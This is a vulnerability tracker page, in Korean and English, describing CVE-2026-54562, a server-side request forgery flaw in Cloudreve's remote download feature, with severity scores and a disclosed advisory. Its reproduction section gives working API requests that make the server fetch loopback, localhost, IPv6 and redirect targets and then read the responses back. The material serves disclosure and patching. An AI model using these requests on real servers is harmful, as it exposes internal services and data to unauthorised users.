Kestrel
대시보드로 돌아가기
CVE-2026-54562MEDIUM· 6.5MITRENVDGHSA대응게시일: 2026. 07. 15.수정일: 2026. 07. 20.

Cloudreve: Non-admin remote download users can SSRF loopback/internal services and read imported responses

SSRF

위협 신호 · CVSS · EPSS · KEV

정기 패치· 높은 악용 신호 없음
CVSS
6.5medium

이론적 심각도 점수

EPSS
0.2%상위 84.3%

30일 내 악용 확률 예측

KEV
미등재

실측 악용 기록 없음

권장 대응 기한60일 이내CISA SSVC 기준

계획된 패치 주기 내 조치(60일 이내)

외부 노출· KEV 미등재 · 자동화 어려움 · 부분 영향 · 외부 노출

CVSS 벡터 · 메트릭

악용 경로
공격 벡터네트워크
공격 복잡도낮음
필요 권한낮음
사용자 상호작용불필요
범위불변
영향
기밀성 영향높음
무결성 영향없음
가용성 영향없음
버전별 점수
CVSS 3.16.5MODERATE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

상세 설명

Summary

Cloudreve's remote download workflow accepts user-supplied URLs and passes them to the configured downloader without blocking loopback, localhost, IPv6 localhost, or redirect-to-loopback targets.

When the remote download permission is granted to a non-admin user group, a normal authenticated user can make the server-side downloader fetch internal-only URLs and then read the fetched response after it is imported into the user's own Cloudreve files.

This does not affect default normal users unless the remote download permission is enabled for their group. However, the permission is a feature-level user-group capability and does not make the user an administrator.

Attacker requirements

The attacker must be:

  • authenticated
  • non-admin
  • in a user group where GroupPermissionRemoteDownload is enabled

Default normal users are blocked from the affected workflow. In the default install, only the admin group has the remote download permission, while the default User group does not.

Affected endpoint

text
1POST /api/v4/workflow/download

Follow-up attacker readback was performed through normal workflow and file APIs:

text
1GET /api/v4/workflow?category=downloaded...
2GET /api/v4/file?uri=cloudreve://my...
3POST /api/v4/file/url

Root cause

The remote download workflow checks whether the user group has remote download permission, but it does not validate the submitted URL before passing it to the downloader.

Relevant code paths:

  • service/explorer/workflows.go:81
  • pkg/filemanager/workflows/remote_download.go:202
  • pkg/downloader/aria2/aria2.go:56

The application does not block loopback, localhost, IPv6 localhost, or redirect targets resolving to internal addresses.

Impact

A non-admin user with remote download permission can use Cloudreve as an SSRF primitive to access services reachable from the downloader environment.

In my test, the attacker could fetch internal loopback URLs and read the response body after Cloudreve imported the downloaded content into the attacker's own files.

Confirmed targets:

  • http://127.0.0.1:7777/secret2
  • http://localhost:7777/localsecret
  • http://[::1]:7780/v6secret
  • redirect to http://127.0.0.1:7777/redirsecret

This can expose internal HTTP services, loopback-only admin panels, local service metadata, or other network resources that are not directly reachable by the attacker.

Reproduction

1. Permission negative control

The attacker is a normal non-admin user in the default User group.

Before enabling remote download for the group:

text
1POST /api/v4/workflow/download
2Content-Type: application/json
3
4{"src":["http://127.0.0.1:7777/secret"],"dst":"cloudreve://my"}

Response:

text
1{"code":40007,"msg":"Group not allowed to download files"}

2. Enable only remote download permission for the non-admin group

The default install grants remote download to the admin group only. The default User group does not have it.

Confirmed in:

  • inventory/migration.go:154
  • inventory/migration.go:179

For this test, I only changed group 2 permissions from:

text
1hAg=

to:

text
1hAo=

The attacker remained in the User group and was not made admin. GET /api/v4/user/me still returned the group name as User.

3. Start an internal listener

Example listener on the Cloudreve host:

text
1127.0.0.1:7777

The listener returned a marker response:

text
1SSRF_SECRET_2_20260527

4. Queue a remote download to loopback

text
1POST /api/v4/workflow/download
2Content-Type: application/json
3
4{"src":["http://127.0.0.1:7777/secret2"],"dst":"cloudreve://my"}

Response:

text
1{"code":0,"data":[{"id":"OzH4","status":"queued","type":"remote_download"}]}

The internal listener received the request:

text
1127.0.0.1 - - [27/May/2026 13:00:46] "GET /secret2 HTTP/1.1" 200 -

Aria2 completed the download:

text
1Download complete: /home/b4r/cysec/cvehunting/cloudreve/data/temp/.../secret2

5. Read the imported internal response as the attacker

The task completed successfully:

text
1{"id":"OzH4","status":"completed","summary":{"props":{"src_str":"http://127.0.0.1:7777/secret2","failed":0}}}

The attacker could list the imported file:

text
1{"name":"secret2","path":"cloudreve://my/secret2"}

The attacker could then download and read the response body:

text
1SSRF_SECRET_2_20260527

Additional validated variants

localhost

Input:

text
1http://localhost:7777/localsecret

Attacker readback:

text
1LOCALHOST_SECRET_20260527

Redirect to loopback

Input:

text
1http://127.0.0.1:7779/anything

Redirect:

text
1302 Location: http://127.0.0.1:7777/redirsecret

Attacker readback:

text
1REDIR_SECRET_20260527

IPv6 localhost

Input:

text
1http://[::1]:7780/v6secret

Attacker readback:

text
1IPV6_SECRET_20260527

Expected behavior

Cloudreve should reject remote download URLs that resolve to loopback, localhost, private network ranges, link-local ranges, metadata service ranges, or other internal-only targets unless explicitly allowed by an administrator.

Redirect targets should be checked with the same policy.

Actual behavior

Cloudreve accepts the URL, passes it to the downloader, imports the fetched internal response into the attacker's files, and allows the attacker to read it.

AI 심층 분석

공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.